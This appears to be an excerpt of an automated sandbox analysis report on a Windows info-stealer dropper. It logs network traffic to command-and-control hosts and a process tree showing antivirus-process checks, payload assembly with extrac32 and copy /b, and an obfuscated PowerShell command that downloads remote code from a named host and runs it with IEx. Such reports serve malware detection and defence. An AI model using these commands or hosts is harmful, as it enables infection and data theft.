                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=0CWBWYN6H
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 583211
                                                                                                                                                  Host: battlecaredh.click
2024-12-29 15:37:00 UTC | 15331 | OUT | Data Ascii: --0CWBWYN6HContent-Disposition: form-data; name="hwid"14654DF6EAF0FCE6BC510B35BBB55F9A--0CWBWYN6HContent-Disposition: form-data; name="pid"1--0CWBWYN6HContent-Disposition: form-data; name="lid"hRjzG3--TRON--0CWBWYN6HContent-Dispo
                                                                                                                                                  Data Ascii: ?rh7h@. `AQ`yo! S^hhR\dM&MBgIOm3>bv84AEZc.JN_^`wuR"bWG:h,jPrWB&/3Z%p%?5@Smr* :CuH,Z-F#%fQ=*},
                                                                                                                                                  2024-12-29 15:37:00 UTC15331OUTData Raw: 28 fb 64 10 e4 7e b7 4c de 5c b5 6b df b8 17 f7 a5 cf 00 97 92 52 3a 94 90 52 5a 6b c9 fc 8b d7 f6 49 8e d7 f6 bd 7c 5a a1 31 c4 c5 9a 3e 53 20 88 4a 9e 3f f7 91 f7 ae a2 21 a4 9d 37 cb 53 09 5d e9 f2 fa 14 93 10 dc b7 71 a3 57 f1 23 6b d2 a1 f7 b9 90 97 af d6 31 a3 a6 77 9c 36 ae 20 f6 85 04 c1 07 4a fd e2 ce 74 92 10 c3 21 80 29 07 4d a7 ef 67 c7 71 3c 7d 85 42 f7 37 5a 32 cb 7a b7 d3 4b 7c 7b d0 b0 d7 fa 49 7d cf f3 a5 bd ef 28 73 77 7b f4 5d de f7 2c ae 56 f8 3d 35 9d ab 28 3e 4a 31 ab f4 70 9c 57 f8 d8 8f 24 c3 cc 8f 03 17 26 9a f6 17 df dc ef e1 ef 95 eb 34 d1 fe b9 bc 33 bc f2 23 07 b5 29 87 29 be 06 89 cd 6f b4 ba 7f f0 01 d6 77 30 d9 d4 f4 e6 7f dd 45 45 22 60 49 89 5f 37 74 6d f6 8b 03 92 a3 f7 bb bd f7 01 ad aa e4 55 61 77 44 1c c4 35 6f 9b e3
                                                                                                                                                  Data Ascii: (d~L\kR:RZkI|Z1>S J?!7S]qW#k1w6 Jt!)Mgq<}B7Z2zK|{I}(sw{],V=5(>J1pW$&43#))ow0EE"`I_7tmUawD5o
2024-12-29 15:37:02 UTC | 1143 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:02 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=k5fp9c0tq69a04elb6dqer74n3; expires=Thu, 24 Apr 2025 09:23:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PuJU6H%2Fl384QsJb%2F4%2BtbZuYjlip88IgR1Qg6TaztfyBJgOiNFetpLqt5Z9RKnbZtrEnb2NQWUARW0R%2FKOiQFHvGhxuqZKDIRRf90pG7%2B%2FQtqo%2B7zboJtL19WXnLxTdCWkmzAVoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade743ac68cda-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1836&rtt_var=689&sent=298&recv=602&lost=0&retrans=0&sent_bytes=2847&recv_bytes=585795&delivery_rate=1586094&cwnd=242&unsent_bytes=0&cid=ed141537fa121591&ts=2319&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49748 | 104.21.32.1 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:37:04 UTC | 267 | OUT | POST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 113
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:37:04 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41
                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=14654DF6EAF0FCE6BC510B35BBB55F9A
2024-12-29 15:37:05 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:05 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=r89p1je0l0smdkfha1qmk2ims5; expires=Thu, 24 Apr 2025 09:23:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ulPTBbYdxntEETSpsEwXo4PDfHkjW7vperQM7ZLJxdiRchLBwHDqy5JEzD2mihPFGBbKKNZX05CABbQ1oCC8e76nEmBIGDtAfocGRwaVMzIvlpadbC5jx9vAKhl3v9Nzz7Fh7qI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade8b8cd072b9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1762&rtt_var=678&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1016&delivery_rate=1593016&cwnd=214&unsent_bytes=0&cid=6e25b12b6c035dc9&ts=947&x=0"
                                                                                                                                                  2024-12-29 15:37:05 UTC218INData Raw: 64 34 0d 0a 6b 78 33 38 4b 75 4d 6f 6e 38 70 61 4b 48 76 66 2f 79 30 49 79 2f 55 48 42 30 65 68 44 69 46 2f 50 6d 68 70 77 7a 7a 72 5a 56 37 49 5a 74 35 66 77 52 4b 39 6f 69 35 63 43 36 7a 46 63 53 65 58 32 6d 52 69 49 4e 51 67 55 68 64 52 47 44 58 73 42 4e 35 53 61 71 45 72 7a 68 37 58 48 73 50 6c 4b 6b 42 56 71 34 64 5a 4b 75 66 58 59 58 4e 6c 6d 7a 77 4e 58 56 74 4b 55 2f 4a 42 78 78 35 38 35 6a 2f 47 43 49 74 63 36 37 6f 70 45 69 66 77 6f 77 4a 6a 70 35 78 33 63 54 4c 4d 5a 31 49 4b 56 30 59 61 71 31 4f 62 4f 58 48 36 63 34 68 31 67 45 54 76 6c 53 6c 41 47 76 47 4c 56 58 7a 70 32 53 56 68 4d 34 4d 30 45 56 4d 63 44 55 76 35 44 4a 59 34 0d 0a
                                                                                                                                                  Data Ascii: d4kx38KuMon8paKHvf/y0Iy/UHB0ehDiF/PmhpwzzrZV7IZt5fwRK9oi5cC6zFcSeX2mRiINQgUhdRGDXsBN5SaqErzh7XHsPlKkBVq4dZKufXYXNlmzwNXVtKU/JBxx585j/GCItc67opEifwowJjp5x3cTLMZ1IKV0Yaq1ObOXH6c4h1gETvlSlAGvGLVXzp2SVhM4M0EVMcDUv5DJY4
                                                                                                                                                  2024-12-29 15:37:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 185.161.251.21 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:37:07 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Host: cegu.shop
2024-12-29 15:37:08 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.26.2
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:07 GMT
                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                  Content-Length: 329
                                                                                                                                                  Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "676c9e2a-149"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-12-29 15:37:08 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                  Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49750 | 104.21.37.128 | 443 | 3448 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:37:09 UTC | 206 | OUT | GET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Host: klipvumisui.shop
2024-12-29 15:37:10 UTC | 905 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:10 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 8767044
                                                                                                                                                  Connection: close
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                  Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fl4uE8jgyTxZL6C2y%2BP6ZRqefsSAvmtd5AIcP%2F12lBIjz3WKfGCKv69Xy1yHS%2FUrd88mnzAtHfbMe5evrxq3%2FylVeZIPIY7qluy%2BP6YsE14koi2S3GX7HFdeSKjvjXquRlOe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9adeadcc0380cd-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1517&rtt_var=577&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1883870&cwnd=178&unsent_bytes=0&cid=952d46274a141bca&ts=654&x=0"
                                                                                                                                                  2024-12-29 15:37:10 UTC464INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                  Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUSt
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00
                                                                                                                                                  Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@C
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00
                                                                                                                                                  Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(J



                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:10:36:26
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\@Setup.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:73'409'778 bytes
                                                                                                                                                  MD5 hash:C6F709A40A7D35051EE49AD1E367DF65
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:1
                                                                                                                                                  Start time:10:36:27
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:10:36:27
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:tasklist
                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:tasklist
                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c md 504701
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:extrac32 /Y /E Cc
                                                                                                                                                  Imagebase:0xd30000
                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:findstr /V "Housewares" Expressions
                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.com
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:10:36:30
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep u
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:10:36:30
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:Corporation.com u
                                                                                                                                                  Imagebase:0xe80000
                                                                                                                                                  File size:947'288 bytes
                                                                                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:10:36:30
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:choice /d y /t 5
                                                                                                                                                  Imagebase:0x750000
                                                                                                                                                  File size:28'160 bytes
                                                                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:10:37:06
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:18
                                                                                                                                                  Start time:10:37:06
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:10:37:23
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe
